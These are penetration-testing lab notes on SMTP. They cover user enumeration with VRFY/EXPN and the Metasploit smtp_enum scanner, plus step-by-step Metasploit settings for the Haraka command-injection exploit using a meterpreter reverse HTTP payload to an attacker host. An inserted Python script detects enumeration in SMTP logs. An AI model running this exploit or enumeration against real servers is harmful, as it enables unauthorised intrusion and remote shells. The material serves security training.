03-SMTP (25)
**#SMTP (Simple Mail Transfer Protocol)** [Port: 25 or 465 or 587]
SMTP is a communication protocol used for the transmission of email.
- SMTP uses TCP port 25 by default. It can also be configured to run on TCP ports
465 and 587.
- We can utilize auxiliary modules to enumerate the version of SMTP as well as
user accounts on the target system.
- Search AUX modules:
search type:auxiliary name:smtp
To connect to an SMTP server we use netcat: nc <ip> <port>
- The SMTP service has two internal commands that allow the enumeration
of users:
  - VRFY: confirms the names of valid users
  - EXPN: reveals the actual addresses behind user aliases and e-mail lists (mailing lists)
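From the mail administrator's side, the VRFY/EXPN behaviour described above can be spotted in SMTP session logs. The following is an added example, not part of the original notes: the log format, the sample lines and the names `SAMPLE_LOG` and `find_enumeration` are assumptions made up for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in an assumed format: "<time> <client_ip> <C|S> <SMTP line>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.7 C VRFY root
2024-05-01T10:00:01Z 203.0.113.7 S 250 root <root@mail.example.test>
2024-05-01T10:00:02Z 203.0.113.7 C VRFY admin
2024-05-01T10:00:02Z 203.0.113.7 S 550 5.1.1 <admin>: User unknown
2024-05-01T10:00:03Z 203.0.113.7 C VRFY backup
2024-05-01T10:00:03Z 203.0.113.7 S 550 5.1.1 <backup>: User unknown
2024-05-01T10:00:04Z 203.0.113.7 C EXPN staff
2024-05-01T10:00:04Z 203.0.113.7 S 250 alice <alice@mail.example.test>
2024-05-01T10:05:00Z 198.51.100.20 C VRFY postmaster
2024-05-01T10:05:00Z 198.51.100.20 S 250 postmaster <postmaster@mail.example.test>
"""

LINE = re.compile(r"^(\S+) (\S+) ([CS]) (.*)$")
PROBE = re.compile(r"^(VRFY|EXPN)\s+(\S+)", re.IGNORECASE)
POSITIVE, NEGATIVE = {"250", "251"}, {"550", "551", "553"}

def find_enumeration(log_text, min_probes=3):
    """Summarise clients that sent at least min_probes VRFY/EXPN commands."""
    stats = defaultdict(lambda: {"probes": 0, "confirmed": set(), "codes": set()})
    pending = {}  # client_ip -> probed name still waiting for the server reply
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        _, ip, direction, text = m.groups()
        if direction == "C":
            probe = PROBE.match(text)
            pending.pop(ip, None)
            if probe:
                stats[ip]["probes"] += 1
                pending[ip] = probe.group(2).lower()
        elif ip in pending:
            name, code = pending.pop(ip), text[:3]
            stats[ip]["codes"].add(code)
            if code in POSITIVE:  # the server confirmed that the name exists
                stats[ip]["confirmed"].add(name)
    report = {}
    for ip, s in stats.items():
        if s["probes"] >= min_probes:
            # Mixed positive/negative replies: the server reveals which names are valid.
            oracle = bool(s["codes"] & POSITIVE) and bool(s["codes"] & NEGATIVE)
            report[ip] = {"probes": s["probes"], "confirmed": sorted(s["confirmed"]),
                          "server_is_oracle": oracle}
    return report
```

A client flagged with `server_is_oracle` set means the server answers VRFY/EXPN differently for valid and invalid names; disabling those commands on the mail server removes that signal.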
Haraka SMTP server:
Haraka is an open-source, high-performance SMTP server developed in Node.js.
The Haraka SMTP server comes with a plugin for processing attachments.
Haraka versions prior to V2.8.9 are vulnerable to command injection.
MSF Module:
exploit/linux/smtp/haraka
Then
set rhost <target_ip>
Then
set SRVPORT 9898
Then
set email_to root@attackdefense.test
Then set a staged payload:
set payload linux/x64/meterpreter_reverse_http
set LHOST <attacking_IP>
MSF Modules:
This module is very useful for collecting existing usernames on the target:
auxiliary/scanner/smtp/smtp_enum
set UNIXONLY false
If you are not working on a Linux target.
- Also select a proper USER_FILE based on the target.